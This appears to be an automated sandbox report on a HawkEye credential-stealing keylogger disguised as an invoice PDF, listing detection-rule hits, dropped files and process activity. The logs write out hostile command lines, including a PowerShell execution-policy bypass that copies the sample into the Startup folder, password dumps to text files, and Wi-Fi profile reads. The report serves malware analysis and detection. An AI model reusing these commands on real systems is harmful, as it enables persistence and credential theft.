                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: PO_Invoices_pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            Source: I$s#$lT3ssl.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            Source: hawkgoods.exe.5.dr, Form1.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                            Source: hawkgoods.exe.5.dr, Form1.cs Cryptographic APIs: 'CreateDecryptor'
                            Source: origigoods40.exe.5.dr, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                            Source: hawkgoods.exe.5.dr, Form1.cs Base64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs Base64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs Base64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.251356418.000000000654B000.00000004.00000001.sdmp Binary or memory string: Yu Type Library is a Trademark of JIYUKOBO Ltd. registered in Japan.slnt
                            Source: PO_Invoices_pdf.exe, 00000000.00000003.251513936.000000000654B000.00000004.00000001.sdmp Binary or memory string: n Japan.slnt
                            Source: classification engine Classification label: mal100.phis.troj.adwa.spyw.evad.winEXE@46/40@68/6
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe Code function: 6_2_04B64E52 AdjustTokenPrivileges,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe Code function: 6_2_04B64E1B AdjustTokenPrivileges,
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_Invoices_pdf.exe.log
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_01
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_01
                            Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5440
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3724
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_01
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awkr53h0.pdr.ps1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe System information queried: HandleInformation
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                            Source: PO_Invoices_pdf.exe | Binary or memory string: INSERT INTO [dbo].[UsersTable] ([Id], [userName], [passWord], [locked]) VALUES (@Id, @userName, @passWord, @locked); SELECT Id, us
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.370812465.0000000008DB1000.00000004.00000001.sdmp | Binary or memory string: UPDATE [dbo].[UsersTable] SET [Id] = @Id, [userName] = @userName, [passWord] = @passWord, [locked] = @locked WHERE (([Id] = @Original_Id) AND ([userName] = @Original_userName) AND ([passWord] = @Original_passWord) AND ([locked] = @Original_locked));
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, hawkgoods.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                            Source: PO_Invoices_pdf.exe | ReversingLabs: Detection: 17%
                            Source: unknown | Process created: C:\Users\user\Desktop\PO_Invoices_pdf.exe 'C:\Users\user\Desktop\PO_Invoices_pdf.exe'
                            Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1996
                            Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2092
                            Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 940
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe 'C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods40.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods40.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe 'C:\Users\user~1\AppData\Local\Temp\Matiexgoods.exe' 0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Users\user\AppData\Local\Temp\origigoods20.exe 'C:\Users\user~1\AppData\Local\Temp\origigoods20.exe' 0
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2092
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Process created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                            Source: Window Recorder | Window detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                            Source: PO_Invoices_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: PO_Invoices_pdf.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: PO_Invoices_pdf.exe | Static file information: File size 1655808 > 1048576
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                            Source: PO_Invoices_pdf.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x18fe00
                            Source: PO_Invoices_pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdbHs source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: mscorlib.pdbTD~1\AppData\Local\Temp\hawkgoods.exeAAGZ source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbm source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: RunPE.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277173827.00000000030A1000.00000004.00000001.sdmp
                            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: C:\Windows\mscorlib.pdbl source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: C:\Windows\dll\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe
                            Source: Binary string: symbols\dll\mscorlib.pdb7w source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: oC:\Windows\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.398710420.000000000782A000.00000004.00000010.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: hawkgoods.exe, 00000006.00000002.386288521.00000000026D7000.00000004.00000040.sdmp
                            Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp
                            Source: Binary string: mscorrc.pdb source: hawkgoods.exe, 00000006.00000002.391117104.0000000004E20000.00000002.00000001.sdmp
                            Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp

                            Data Obfuscation:

                            .NET source code contains potential unpacker
                            Source: hawkgoods.exe.5.dr, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: hawkgoods.exe.5.dr, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: hawkgoods.exe.5.dr, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: hawkgoods.exe.5.dr, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00360712 push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_0033BA9D push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00C77EF4 push eax; ret
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00C77B84 push ebx; retf
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_00C77B81 push ebx; retf
                            Source: initial sample | Static PE information: section name: .text entropy: 7.94835272626
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\origigoods40.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\origigoods20.exe
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe

                            Boot Survival:

                            Drops PE files to the startup folder
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
